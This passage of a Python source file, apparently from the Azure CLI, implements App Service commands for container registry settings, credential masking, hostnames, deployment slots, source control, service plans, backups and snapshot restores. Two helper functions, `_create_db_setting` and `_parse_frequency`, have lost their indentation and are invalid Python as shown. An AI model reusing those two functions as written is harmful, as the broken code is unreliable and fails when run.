    slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
    sticky_changed = False
    for setting_name in setting_names:
        conn_strings.properties.pop(setting_name, None)
        if slot_cfg_names.connection_string_names and setting_name in slot_cfg_names.connection_string_names:
            slot_cfg_names.connection_string_names.remove(setting_name)
            sticky_changed = True
    if sticky_changed:
        client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
    return _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
                                       'update_connection_strings',
                                       conn_strings, slot, client)
# App settings that carry container/registry configuration for an app.
CONTAINER_APPSETTING_NAMES = ['DOCKER_REGISTRY_SERVER_URL', 'DOCKER_REGISTRY_SERVER_USERNAME',
                              'DOCKER_REGISTRY_SERVER_PASSWORD', "WEBSITES_ENABLE_APP_SERVICE_STORAGE"]
# Settings whose values must be masked in CLI output (credentials).
APPSETTINGS_TO_MASK = ['DOCKER_REGISTRY_SERVER_PASSWORD']
def update_container_settings(cmd, resource_group_name, name, docker_registry_server_url=None,
                              docker_custom_image_name=None, docker_registry_server_user=None,
                              websites_enable_app_service_storage=None, docker_registry_server_password=None,
                              multicontainer_config_type=None, multicontainer_config_file=None, slot=None):
    """Update the container (Docker) configuration of a web app or slot.

    Registry URL/credentials and the storage toggle are written as app settings;
    the custom image name (or the encoded multicontainer config) is written to
    linuxFxVersion. Returns the container-related app settings with credentials
    masked.
    """
    settings = []
    if docker_registry_server_url is not None:
        settings.append('DOCKER_REGISTRY_SERVER_URL=' + docker_registry_server_url)
    # For an ACR registry with no explicit credentials, try to look up the
    # registry's admin credentials via ARM (best effort — warn on failure).
    if (not docker_registry_server_user and not docker_registry_server_password and
            docker_registry_server_url and '.azurecr.io' in docker_registry_server_url):
        logger.warning('No credential was provided to access Azure Container Registry. Trying to look up...')
        parsed = urlparse(docker_registry_server_url)
        # registry name is the first label of the host; the URL may lack a scheme
        registry_name = (parsed.netloc if parsed.scheme else parsed.path).split('.')[0]
        try:
            docker_registry_server_user, docker_registry_server_password = _get_acr_cred(cmd.cli_ctx, registry_name)
        except Exception as ex:  # pylint: disable=broad-except
            logger.warning("Retrieving credentials failed with an exception:'%s'", ex)  # consider throw if needed
    if docker_registry_server_user is not None:
        settings.append('DOCKER_REGISTRY_SERVER_USERNAME=' + docker_registry_server_user)
    if docker_registry_server_password is not None:
        settings.append('DOCKER_REGISTRY_SERVER_PASSWORD=' + docker_registry_server_password)
    if websites_enable_app_service_storage:
        settings.append('WEBSITES_ENABLE_APP_SERVICE_STORAGE=' + websites_enable_app_service_storage)
    if docker_registry_server_user or docker_registry_server_password or docker_registry_server_url or websites_enable_app_service_storage:  # pylint: disable=line-too-long
        update_app_settings(cmd, resource_group_name, name, settings, slot)
    # re-read so the returned view reflects what the service actually stored
    settings = get_app_settings(cmd, resource_group_name, name, slot)
    if docker_custom_image_name is not None:
        _add_fx_version(cmd, resource_group_name, name, docker_custom_image_name, slot)
    # multicontainer config requires both the file and its type
    if multicontainer_config_file and multicontainer_config_type:
        encoded_config_file = _get_linux_multicontainer_encoded_config_from_file(multicontainer_config_file)
        linux_fx_version = _format_fx_version(encoded_config_file, multicontainer_config_type)
        update_site_configs(cmd, resource_group_name, name, linux_fx_version=linux_fx_version, slot=slot)
    elif multicontainer_config_file or multicontainer_config_type:
        logger.warning('Must change both settings --multicontainer-config-file FILE --multicontainer-config-type TYPE')
    return _mask_creds_related_appsettings(_filter_for_container_settings(cmd, resource_group_name, name, settings,
                                                                          slot=slot))
def update_container_settings_functionapp(cmd, resource_group_name, name, docker_registry_server_url=None,
                                          docker_custom_image_name=None, docker_registry_server_user=None,
                                          docker_registry_server_password=None, slot=None):
    """Function-app variant of update_container_settings.

    Forwards with the app-service-storage toggle and multicontainer options
    disabled, since they do not apply to function apps.
    """
    return update_container_settings(cmd, resource_group_name, name,
                                     docker_registry_server_url=docker_registry_server_url,
                                     docker_custom_image_name=docker_custom_image_name,
                                     docker_registry_server_user=docker_registry_server_user,
                                     websites_enable_app_service_storage=None,
                                     docker_registry_server_password=docker_registry_server_password,
                                     multicontainer_config_type=None,
                                     multicontainer_config_file=None, slot=slot)
def _get_acr_cred(cli_ctx, registry_name):
    """Look up admin credentials for an Azure Container Registry by name.

    Returns a (username, password) tuple. Raises CLIError when the registry
    cannot be resolved uniquely in the subscription, or when its admin user
    is disabled.
    """
    from azure.mgmt.containerregistry import ContainerRegistryManagementClient
    from azure.cli.core.commands.parameters import get_resources_in_subscription
    client = get_mgmt_service_client(cli_ctx, ContainerRegistryManagementClient).registries
    result = get_resources_in_subscription(cli_ctx, 'Microsoft.ContainerRegistry/registries')
    # registry names are globally unique, but guard against 0 or >1 matches anyway
    result = [item for item in result if item.name.lower() == registry_name]
    if not result or len(result) > 1:
        raise CLIError("No resource or more than one were found with name '{}'.".format(registry_name))
    resource_group_name = parse_resource_id(result[0].id)['resource_group']
    registry = client.get(resource_group_name, registry_name)
    if registry.admin_user_enabled:  # pylint: disable=no-member
        cred = client.list_credentials(resource_group_name, registry_name)
        return cred.username, cred.passwords[0].value
    raise CLIError("Failed to retrieve container registry credentials. Please either provide the "
                   "credentials or run 'az acr update -n {} --admin-enabled true' to enable "
                   "admin first.".format(registry_name))
def delete_container_settings(cmd, resource_group_name, name, slot=None):
    """Remove container configuration: clear linuxFxVersion and delete the docker app settings."""
    _delete_linux_fx_version(cmd, resource_group_name, name, slot)
    delete_app_settings(cmd, resource_group_name, name, CONTAINER_APPSETTING_NAMES, slot)
def show_container_settings(cmd, resource_group_name, name, show_multicontainer_config=None, slot=None):
    """Return the container-related app settings of an app (or slot), with credentials masked."""
    all_settings = get_app_settings(cmd, resource_group_name, name, slot)
    container_settings = _filter_for_container_settings(cmd, resource_group_name, name, all_settings,
                                                        show_multicontainer_config, slot)
    return _mask_creds_related_appsettings(container_settings)
def show_container_settings_functionapp(cmd, resource_group_name, name, slot=None):
    """Function-app variant: same as show_container_settings, without multicontainer decoding."""
    return show_container_settings(cmd, resource_group_name, name, show_multicontainer_config=None, slot=slot)
def _filter_for_container_settings(cmd, resource_group_name, name, settings,
                                   show_multicontainer_config=None, slot=None):
    """Keep only container-related settings and append the image name from linuxFxVersion.

    When show_multicontainer_config is truthy (and a linuxFxVersion exists),
    also append the decoded multicontainer configuration.
    """
    filtered = [entry for entry in settings if entry['name'] in CONTAINER_APPSETTING_NAMES]
    fx_version = _get_fx_version(cmd, resource_group_name, name, slot).strip()
    if fx_version:
        filtered.append({'name': 'DOCKER_CUSTOM_IMAGE_NAME',
                         'value': fx_version})
        if show_multicontainer_config:
            decoded = _get_linux_multicontainer_decoded_config(cmd, resource_group_name, name, slot)
            filtered.append({'name': 'DOCKER_CUSTOM_IMAGE_NAME_DECODED',
                             'value': decoded})
    return filtered
# TODO: remove this when #3660(service tracking issue) is resolved
def _mask_creds_related_appsettings(settings):
    """Blank out sensitive registry values (APPSETTINGS_TO_MASK) before display.

    Call sites pass a list of {'name': ..., 'value': ...} entries (the shape
    produced by _filter_for_container_settings); a plain name->value dict is
    also supported. The previous implementation tested list *elements* (dicts)
    for membership in APPSETTINGS_TO_MASK, so list input was never masked.
    """
    if isinstance(settings, dict):
        for setting_name in [n for n in settings if n in APPSETTINGS_TO_MASK]:
            settings[setting_name] = None
    else:
        for entry in settings:
            if entry.get('name') in APPSETTINGS_TO_MASK:
                entry['value'] = None
    return settings
def add_hostname(cmd, resource_group_name, webapp_name, hostname, slot=None):
    """Bind a custom hostname to a web app, or to one of its slots when slot is given."""
    from azure.mgmt.web.models import HostNameBinding
    client = web_client_factory(cmd.cli_ctx)
    webapp = client.web_apps.get(resource_group_name, webapp_name)
    if not webapp:
        raise CLIError("'{}' app doesn't exist".format(webapp_name))
    binding = HostNameBinding(site_name=webapp.name)
    if slot is not None:
        return client.web_apps.create_or_update_host_name_binding_slot(resource_group_name=resource_group_name,
                                                                       name=webapp.name, host_name=hostname,
                                                                       slot=slot, host_name_binding=binding)
    return client.web_apps.create_or_update_host_name_binding(resource_group_name=resource_group_name,
                                                              name=webapp.name, host_name=hostname,
                                                              host_name_binding=binding)
def delete_hostname(cmd, resource_group_name, webapp_name, hostname, slot=None):
    """Remove a hostname binding from the app, or from the given slot."""
    client = web_client_factory(cmd.cli_ctx)
    if slot is not None:
        return client.web_apps.delete_host_name_binding_slot(resource_group_name, webapp_name, slot, hostname)
    return client.web_apps.delete_host_name_binding(resource_group_name, webapp_name, hostname)
def list_hostnames(cmd, resource_group_name, webapp_name, slot=None):
    """List hostname bindings, trimming each binding name to its bare hostname segment."""
    bindings = list(_generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
                                            'list_host_name_bindings', slot))
    for binding in bindings:
        # binding names come back as '<site>/<hostname>'; keep only the hostname part
        binding.name = binding.name.split('/')[-1]
    return bindings
def get_external_ip(cmd, resource_group_name, webapp_name):
    """Resolve the externally reachable IP address of a web app.

    ASE-hosted apps use the ASE's internal IP, the IP-based-SSL virtual IP, or
    the ASE service IP; other apps resolve their default hostname through DNS.
    Returns {'ip': <address>}.
    """
    SslState = cmd.get_models('SslState')
    # logics here are ported from portal
    client = web_client_factory(cmd.cli_ctx)
    webapp = client.web_apps.get(resource_group_name, webapp_name)
    if not webapp:
        raise CLIError("'{}' app doesn't exist".format(webapp_name))
    if webapp.hosting_environment_profile:
        address = client.app_service_environments.list_vips(
            resource_group_name, webapp.hosting_environment_profile.name)
        if address.internal_ip_address:
            ip_address = address.internal_ip_address
        else:
            # prefer the dedicated virtual IP assigned for IP-based SSL, if any
            vip = next((s for s in webapp.host_name_ssl_states if s.ssl_state == SslState.ip_based_enabled), None)
            ip_address = vip.virtual_ip if vip else address.service_ip_address
    else:
        ip_address = _resolve_hostname_through_dns(webapp.default_host_name)
    return {'ip': ip_address}
def _resolve_hostname_through_dns(hostname):
    """Resolve *hostname* to an IPv4 address via the system resolver."""
    from socket import gethostbyname
    return gethostbyname(hostname)
def create_webapp_slot(cmd, resource_group_name, webapp, slot, configuration_source=None):
    """Create a deployment slot for a web app, optionally cloning configuration.

    configuration_source may be the app's own name (clone from production) or
    another slot's name. Function apps are rejected with a pointer to the
    functionapp command. Returns the created slot with its short name.
    """
    Site, SiteConfig, NameValuePair = cmd.get_models('Site', 'SiteConfig', 'NameValuePair')
    client = web_client_factory(cmd.cli_ctx)
    site = client.web_apps.get(resource_group_name, webapp)
    site_config = get_site_configs(cmd, resource_group_name, webapp, None)
    if not site:
        raise CLIError("'{}' app doesn't exist".format(webapp))
    if 'functionapp' in site.kind:
        raise CLIError("'{}' is a function app. Please use `az functionapp deployment slot create`.".format(webapp))
    location = site.location
    slot_def = Site(server_farm_id=site.server_farm_id, location=location)
    slot_def.site_config = SiteConfig()
    # if it is a Windows Container site, at least pass the necessary
    # app settings to perform the container image validation:
    if configuration_source and site_config.windows_fx_version:
        # get settings from the source
        clone_from_prod = configuration_source.lower() == webapp.lower()
        src_slot = None if clone_from_prod else configuration_source
        app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
                                               'list_application_settings', src_slot)
        settings = []
        for k, v in app_settings.properties.items():
            if k in ("DOCKER_REGISTRY_SERVER_USERNAME", "DOCKER_REGISTRY_SERVER_PASSWORD",
                     "DOCKER_REGISTRY_SERVER_URL"):
                settings.append(NameValuePair(name=k, value=v))
        slot_def.site_config = SiteConfig(app_settings=settings)
    poller = client.web_apps.begin_create_or_update_slot(resource_group_name, webapp, site_envelope=slot_def, slot=slot)
    result = LongRunningOperation(cmd.cli_ctx)(poller)
    # full configuration clone (settings/connection strings) happens after creation
    if configuration_source:
        update_slot_configuration_from_source(cmd, client, resource_group_name, webapp, slot, configuration_source)
    # result name comes back as '<app>/<slot>'; keep only the slot part
    result.name = result.name.split('/')[-1]
    return result
def create_functionapp_slot(cmd, resource_group_name, name, slot, configuration_source=None):
    """Create a deployment slot for a function app, optionally cloning its configuration."""
    Site = cmd.get_models('Site')
    client = web_client_factory(cmd.cli_ctx)
    site = client.web_apps.get(resource_group_name, name)
    if not site:
        raise CLIError("'{}' function app doesn't exist".format(name))
    slot_def = Site(server_farm_id=site.server_farm_id, location=site.location)
    poller = client.web_apps.begin_create_or_update_slot(resource_group_name, name, site_envelope=slot_def, slot=slot)
    result = LongRunningOperation(cmd.cli_ctx)(poller)
    if configuration_source:
        update_slot_configuration_from_source(cmd, client, resource_group_name, name, slot, configuration_source)
    # result name comes back as '<app>/<slot>'; keep only the slot part
    result.name = result.name.split('/')[-1]
    return result
def update_slot_configuration_from_source(cmd, client, resource_group_name, webapp, slot, configuration_source=None):
    """Clone site config, app settings and connection strings from a source into *slot*.

    The source is production when configuration_source equals the app name,
    otherwise the named slot. Slot-sticky settings are filtered out so they
    do not propagate to the new slot.
    """
    clone_from_prod = configuration_source.lower() == webapp.lower()
    site_config = get_site_configs(cmd, resource_group_name, webapp,
                                   None if clone_from_prod else configuration_source)
    _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
                            'update_configuration', slot, site_config)
    # slot create doesn't clone over the app-settings and connection-strings, so we do it here
    # also make sure slot settings don't get propagated.
    slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, webapp)
    src_slot = None if clone_from_prod else configuration_source
    app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
                                           'list_application_settings',
                                           src_slot)
    for a in slot_cfg_names.app_setting_names or []:
        app_settings.properties.pop(a, None)
    connection_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
                                                 'list_connection_strings',
                                                 src_slot)
    for a in slot_cfg_names.connection_string_names or []:
        connection_strings.properties.pop(a, None)
    _generic_settings_operation(cmd.cli_ctx, resource_group_name, webapp,
                                'update_application_settings',
                                app_settings, slot, client)
    _generic_settings_operation(cmd.cli_ctx, resource_group_name, webapp,
                                'update_connection_strings',
                                connection_strings, slot, client)
def config_source_control(cmd, resource_group_name, name, repo_url, repository_type='git', branch=None,  # pylint: disable=too-many-locals
                          manual_integration=None, git_token=None, slot=None, github_action=None):
    """Configure source-control based deployment (git/mercurial/GitHub Actions) for an app.

    A provided git_token is first cached subscription-wide via
    update_source_control. The SCM configuration call is retried up to 5
    times on 50x server errors.
    """
    client = web_client_factory(cmd.cli_ctx)
    location = _get_location_from_webapp(client, resource_group_name, name)
    from azure.mgmt.web.models import SiteSourceControl, SourceControl
    if git_token:
        sc = SourceControl(location=location, source_control_name='GitHub', token=git_token)
        client.update_source_control('GitHub', sc)
    source_control = SiteSourceControl(location=location, repo_url=repo_url, branch=branch,
                                       is_manual_integration=manual_integration,
                                       is_mercurial=(repository_type != 'git'), is_git_hub_action=bool(github_action))
    # SCC config can fail if previous commands caused SCMSite shutdown, so retry here.
    for i in range(5):
        try:
            poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                             'begin_create_or_update_source_control',
                                             slot, source_control)
            return LongRunningOperation(cmd.cli_ctx)(poller)
        except Exception as ex:  # pylint: disable=broad-except
            import re
            ex = ex_handler_factory(no_throw=True)(ex)
            # for non server errors(50x), just throw; otherwise retry 4 times
            if i == 4 or not re.findall(r'\(50\d\)', str(ex)):
                raise
            logger.warning('retrying %s/4', i + 1)
            time.sleep(5)   # retry in a moment
def update_git_token(cmd, git_token=None):
    '''
    Update source control token cached in Azure app service. If no token is provided,
    the command will clean up existing token.
    '''
    from azure.mgmt.web.models import SourceControl
    client = web_client_factory(cmd.cli_ctx)
    source_control = SourceControl(name='not-really-needed', source_control_name='GitHub',
                                   token=git_token or '')
    return client.update_source_control('GitHub', source_control)
def show_source_control(cmd, resource_group_name, name, slot=None):
    """Show the source-control configuration of an app (or slot)."""
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_source_control', slot)
def delete_source_control(cmd, resource_group_name, name, slot=None):
    """Delete the source-control configuration of an app (or slot)."""
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'delete_source_control', slot)
def enable_local_git(cmd, resource_group_name, name, slot=None):
    """Turn on Local Git deployment for the app and return its git clone URL."""
    client = web_client_factory(cmd.cli_ctx)
    site_config = get_site_configs(cmd, resource_group_name, name, slot)
    site_config.scm_type = 'LocalGit'
    _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'create_or_update_configuration', slot, site_config)
    local_git_url = _get_local_git_url(cmd.cli_ctx, client, resource_group_name, name, slot)
    return {'url': local_git_url}
def sync_site_repo(cmd, resource_group_name, name, slot=None):
    """Trigger a sync of the app's configured repository."""
    try:
        return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'sync_repository', slot)
    except CloudError as ex:  # Because of bad spec, sdk throws on 200. We capture it here
        if ex.status_code not in [200, 204]:
            raise ex
def list_app_service_plans(cmd, resource_group_name=None):
    """List app service plans, subscription-wide or within a single resource group."""
    client = web_client_factory(cmd.cli_ctx)
    if resource_group_name is not None:
        plans = list(client.app_service_plans.list_by_resource_group(resource_group_name))
    else:
        plans = list(client.app_service_plans.list(detailed=True))  # enables querying "numberOfSites"
    for plan in plans:
        # prune a few useless fields
        del plan.geo_region
        del plan.subscription
    return plans
def create_app_service_plan(cmd, resource_group_name, name, is_linux, hyper_v, per_site_scaling=False,
                            app_service_environment=None, sku='B1', number_of_workers=None, location=None,
                            tags=None, no_wait=False):
    """Create an app service plan, optionally inside an App Service Environment.

    is_linux and hyper_v (Windows containers) are mutually exclusive. When an
    ASE is given, the plan's location is forced to the ASE's location and
    Windows containers are rejected.
    """
    HostingEnvironmentProfile, SkuDescription, AppServicePlan = cmd.get_models(
        'HostingEnvironmentProfile', 'SkuDescription', 'AppServicePlan')
    sku = _normalize_sku(sku)
    _validate_asp_sku(app_service_environment, sku)
    if is_linux and hyper_v:
        raise MutuallyExclusiveArgumentError('Usage error: --is-linux and --hyper-v cannot be used together.')
    client = web_client_factory(cmd.cli_ctx)
    if app_service_environment:
        if hyper_v:
            raise ArgumentUsageError('Windows containers is not yet supported in app service environment')
        # the ASE may be referenced either by bare name or by full resource id
        ase_list = client.app_service_environments.list()
        ase_found = False
        ase = None
        for ase in ase_list:
            if ase.name.lower() == app_service_environment.lower() or ase.id.lower() == app_service_environment.lower():
                ase_def = HostingEnvironmentProfile(id=ase.id)
                location = ase.location
                ase_found = True
                break
        if not ase_found:
            err_msg = "App service environment '{}' not found in subscription.".format(app_service_environment)
            raise ResourceNotFoundError(err_msg)
    else:  # Non-ASE
        ase_def = None
        if location is None:
            location = _get_location_from_resource_group(cmd.cli_ctx, resource_group_name)
    # the api is odd on parameter naming, have to live with it for now
    sku_def = SkuDescription(tier=get_sku_name(sku), name=sku, capacity=number_of_workers)
    plan_def = AppServicePlan(location=location, tags=tags, sku=sku_def,
                              reserved=(is_linux or None), hyper_v=(hyper_v or None), name=name,
                              per_site_scaling=per_site_scaling, hosting_environment_profile=ase_def)
    return sdk_no_wait(no_wait, client.app_service_plans.begin_create_or_update, name=name,
                       resource_group_name=resource_group_name, app_service_plan=plan_def)
def update_app_service_plan(instance, sku=None, number_of_workers=None):
    """Apply a new SKU and/or worker count to an app service plan instance, in place.

    Warns (but still returns the unchanged instance) when neither option is given.
    """
    if sku is None and number_of_workers is None:
        logger.warning('No update is done. Specify --sku and/or --number-of-workers.')
    plan_sku = instance.sku
    if sku is not None:
        normalized = _normalize_sku(sku)
        plan_sku.tier = get_sku_name(normalized)
        plan_sku.name = normalized
    if number_of_workers is not None:
        plan_sku.capacity = number_of_workers
    instance.sku = plan_sku
    return instance
def show_plan(cmd, resource_group_name, name):
    """Fetch an app service plan via a raw ARM GET and return the parsed JSON body."""
    from azure.cli.core.commands.client_factory import get_subscription_id
    client = web_client_factory(cmd.cli_ctx)
    serverfarm_url = ('subscriptions/{}/resourceGroups/{}/providers/Microsoft.Web/serverfarms/{}?api-version={}'
                      .format(get_subscription_id(cmd.cli_ctx), resource_group_name, name,
                              client.DEFAULT_API_VERSION))
    request_url = cmd.cli_ctx.cloud.endpoints.resource_manager + serverfarm_url
    response = send_raw_request(cmd.cli_ctx, "GET", request_url)
    return response.json()
def update_functionapp_app_service_plan(cmd, instance, sku=None, number_of_workers=None, max_burst=None):
    """Update sku, worker count and/or max burst on a function app's plan.

    --max-burst is only valid for Elastic Premium plans; worker count is
    range-validated to 0..20.
    """
    # apply sku/workers first so the Elastic Premium check below sees the updated sku
    instance = update_app_service_plan(instance, sku, number_of_workers)
    if max_burst is not None:
        if not is_plan_elastic_premium(cmd, instance):
            raise CLIError("Usage error: --max-burst is only supported for Elastic Premium (EP) plans")
        max_burst = validate_range_of_int_flag('--max-burst', max_burst, min_val=0, max_val=20)
        instance.maximum_elastic_worker_count = max_burst
    if number_of_workers is not None:
        number_of_workers = validate_range_of_int_flag('--number-of-workers / --min-instances',
                                                       number_of_workers, min_val=0, max_val=20)
    # NOTE(review): this re-applies sku/number_of_workers (now range-validated);
    # redundant with the call above but harmless since the values are identical
    return update_app_service_plan(instance, sku, number_of_workers)
def show_backup_configuration(cmd, resource_group_name, webapp_name, slot=None):
    """Return the backup configuration of an app (or slot); any failure surfaces as 'not found'."""
    try:
        return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
                                       'get_backup_configuration', slot)
    except Exception:  # pylint: disable=broad-except
        raise CLIError('Backup configuration not found')
def list_backups(cmd, resource_group_name, webapp_name, slot=None):
    """List the backups of a web app (or slot)."""
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'list_backups', slot)
def create_backup(cmd, resource_group_name, webapp_name, storage_account_url,
                  db_name=None, db_type=None,
                  db_connection_string=None, backup_name=None, slot=None):
    """Trigger an on-demand backup of a web app (or slot) into the given storage container."""
    BackupRequest = cmd.get_models('BackupRequest')
    client = web_client_factory(cmd.cli_ctx)
    # the service appends '.zip' itself, so drop a user-supplied extension
    if backup_name and backup_name.lower().endswith('.zip'):
        backup_name = backup_name[:-4]
    databases = _create_db_setting(cmd, db_name, db_type=db_type, db_connection_string=db_connection_string)
    request = BackupRequest(backup_name=backup_name,
                            storage_account_url=storage_account_url, databases=databases)
    if not slot:
        return client.web_apps.backup(resource_group_name, webapp_name, request)
    return client.web_apps.backup_slot(resource_group_name, webapp_name, request, slot)
def update_backup_schedule(cmd, resource_group_name, webapp_name, storage_account_url=None,
                           frequency=None, keep_at_least_one_backup=None,
                           retention_period_in_days=None, db_name=None,
                           db_connection_string=None, db_type=None, backup_name=None, slot=None):
    """Create or update the scheduled-backup configuration of a web app (or slot).

    Arguments left as None fall back to the existing configuration's values.
    When no configuration exists yet, the storage URL, frequency, retention
    and retain-one flag must all be supplied.
    """
    BackupSchedule, BackupRequest = cmd.get_models('BackupSchedule', 'BackupRequest')
    configuration = None
    # the service appends '.zip' itself, so drop a user-supplied extension
    if backup_name and backup_name.lower().endswith('.zip'):
        backup_name = backup_name[:-4]
    if not backup_name:
        backup_name = '{0}_{1}'.format(webapp_name, datetime.datetime.utcnow().strftime('%Y%m%d%H%M'))
    try:
        configuration = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
                                                'get_backup_configuration', slot)
    except Exception:  # pylint: disable=broad-except
        # No configuration set yet
        if not all([storage_account_url, frequency, retention_period_in_days,
                    keep_at_least_one_backup]):
            raise CLIError('No backup configuration found. A configuration must be created. ' +
                           'Usage: --container-url URL --frequency TIME --retention DAYS ' +
                           '--retain-one TRUE/FALSE')
    # If arguments were not specified, use the values in the current backup schedule
    if storage_account_url is None:
        storage_account_url = configuration.storage_account_url
    if retention_period_in_days is None:
        retention_period_in_days = configuration.backup_schedule.retention_period_in_days
    if keep_at_least_one_backup is None:
        keep_at_least_one_backup = configuration.backup_schedule.keep_at_least_one_backup
    else:
        # the CLI passes this flag as a string; normalize to bool
        keep_at_least_one_backup = keep_at_least_one_backup.lower() == 'true'
    if frequency:
        # Parse schedule frequency
        frequency_num, frequency_unit = _parse_frequency(cmd, frequency)
    else:
        frequency_num = configuration.backup_schedule.frequency_interval
        frequency_unit = configuration.backup_schedule.frequency_unit
    # carry over database settings from the existing configuration when not overridden
    if configuration and configuration.databases:
        db = configuration.databases[0]
        db_type = db_type or db.database_type
        db_name = db_name or db.name
        db_connection_string = db_connection_string or db.connection_string
    db_setting = _create_db_setting(cmd, db_name, db_type=db_type, db_connection_string=db_connection_string)
    backup_schedule = BackupSchedule(frequency_interval=frequency_num, frequency_unit=frequency_unit.name,
                                     keep_at_least_one_backup=keep_at_least_one_backup,
                                     retention_period_in_days=retention_period_in_days)
    backup_request = BackupRequest(backup_request_name=backup_name, backup_schedule=backup_schedule,
                                   enabled=True, storage_account_url=storage_account_url,
                                   databases=db_setting)
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'update_backup_configuration',
                                   slot, backup_request)
def restore_backup(cmd, resource_group_name, webapp_name, storage_account_url, backup_name,
                   db_name=None, db_type=None, db_connection_string=None,
                   target_name=None, overwrite=None, ignore_hostname_conflict=None, slot=None):
    """Restore a web app (or slot) from a backup blob in the given storage container."""
    RestoreRequest = cmd.get_models('RestoreRequest')
    client = web_client_factory(cmd.cli_ctx)
    blob_name = backup_name if backup_name.lower().endswith('.zip') else backup_name + '.zip'
    databases = _create_db_setting(cmd, db_name, db_type=db_type, db_connection_string=db_connection_string)
    request = RestoreRequest(storage_account_url=storage_account_url,
                             blob_name=blob_name, overwrite=overwrite,
                             site_name=target_name, databases=databases,
                             ignore_conflicting_host_names=ignore_hostname_conflict)
    # NOTE(review): 0 appears to be a placeholder backup id (the blob name selects
    # the backup) — confirm against the SDK signature
    if slot:
        return client.web_apps.restore_slot(resource_group_name, webapp_name, 0, request, slot)
    return client.web_apps.restore(resource_group_name, webapp_name, 0, request)
def list_snapshots(cmd, resource_group_name, name, slot=None):
    """List the restorable snapshots of a web app (or slot)."""
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_snapshots',
                                   slot)
def restore_snapshot(cmd, resource_group_name, name, time, slot=None, restore_content_only=False,  # pylint: disable=redefined-outer-name
                     source_resource_group=None, source_name=None, source_slot=None):
    """Restore a web app from a snapshot.

    With source_resource_group/source_name, restores from another app (or
    its slot) without overwriting; otherwise the app is overwritten with its
    own snapshot. restore_content_only skips restoring site configuration.
    """
    from azure.cli.core.commands.client_factory import get_subscription_id
    SnapshotRecoverySource, SnapshotRestoreRequest = cmd.get_models('SnapshotRecoverySource', 'SnapshotRestoreRequest')
    client = web_client_factory(cmd.cli_ctx)
    recover_config = not restore_content_only
    if all([source_resource_group, source_name]):
        # Restore from source app to target app
        sub_id = get_subscription_id(cmd.cli_ctx)
        source_id = "/subscriptions/" + sub_id + "/resourceGroups/" + source_resource_group + \
                    "/providers/Microsoft.Web/sites/" + source_name
        if source_slot:
            source_id = source_id + "/slots/" + source_slot
        source = SnapshotRecoverySource(id=source_id)
        request = SnapshotRestoreRequest(overwrite=False, snapshot_time=time, recovery_source=source,
                                         recover_configuration=recover_config)
        if slot:
            return client.web_apps.restore_snapshot_slot(resource_group_name, name, request, slot)
        return client.web_apps.restore_snapshot(resource_group_name, name, request)
    if any([source_resource_group, source_name]):
        raise CLIError('usage error: --source-resource-group and --source-name must both be specified if one is used')
    # Overwrite app with its own snapshot
    request = SnapshotRestoreRequest(overwrite=True, snapshot_time=time, recover_configuration=recover_config)
    if slot:
        return client.web_apps.restore_snapshot_slot(resource_group_name, name, request, slot)
    return client.web_apps.restore_snapshot(resource_group_name, name, request)
# pylint: disable=inconsistent-return-statements
def _create_db_setting(cmd, db_name, db_type, db_connection_string):
DatabaseBackupSetting = cmd.get_models('DatabaseBackupSetting')
if all([db_name, db_type, db_connection_string]):
return [DatabaseBackupSetting(database_type=db_type, name=db_name, connection_string=db_connection_string)]
if any([db_name, db_type, db_connection_string]):
raise CLIError('usage error: --db-name NAME --db-type TYPE --db-connection-string STRING')
def _parse_frequency(cmd, frequency):
FrequencyUnit = cmd.get_models('FrequencyUnit')
unit_part = frequency.lower()[-1]
if unit_part == 'd':
frequency_unit = FrequencyUnit.day
elif unit_part == 'h':
frequency_unit = FrequencyUnit.hour
else:
raise CLIError('Frequency must end with d or h for "day" or "hour"')
try:
frequency_num = int(frequency[:-1])
except ValueError:
raise CLIError('Frequency must start with a number')
if frequency_num < 0:
raise CLIError('Frequency must be positive')
return frequency_num, frequency_unit
def _get_deleted_apps_locations(cli_ctx):
    """Return the Azure locations where the 'deletedSites' resource type is available."""
    client = get_mgmt_service_client(cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES)
    web_provider = client.providers.get('Microsoft.Web')
    for resource_type in web_provider.resource_types:
        if resource_type.resource_type == 'deletedSites':
            return resource_type.locations
    return []
def _get_local_git_url(cli_ctx, client, resource_group_name, name, slot=None):
    """Compose the Local Git clone URL for an app, embedding the publishing user name."""
    publishing_user = client.get_publishing_user()
    source_control = _generic_site_operation(cli_ctx, resource_group_name, name, 'get_source_control', slot)
    parsed = urlparse(source_control.repo_url)
    return '{}://{}@{}/{}.git'.format(parsed.scheme, publishing_user.publishing_user_name,
                                      parsed.netloc, name)
def _get_scm_url(cmd, resource_group_name, name, slot=None):
    """Return the https URL of the app's Kudu/SCM site."""
    from azure.mgmt.web.models import HostType
    webapp = show_webapp(cmd, resource_group_name, name, slot=slot)
    scm_host = next((h for h in webapp.host_name_ssl_states or []
                     if h.host_type == HostType.repository), None)
    if scm_host is not None:
        return "https://{}".format(scm_host.name)
    # this should not happen, but throw anyway
    raise ValueError('Failed to retrieve Scm Uri')
def get_publishing_user(cmd):
    """Return the subscription-wide deployment/publishing user."""
    client = web_client_factory(cmd.cli_ctx)
    return client.get_publishing_user()
def set_deployment_user(cmd, user_name, password=None):
    '''
    Update deployment credentials.(Note, all webapps in your subscription will be impacted)
    '''
    User = cmd.get_models('User')
    client = web_client_factory(cmd.cli_ctx)
    deployment_user = User(publishing_user_name=user_name)
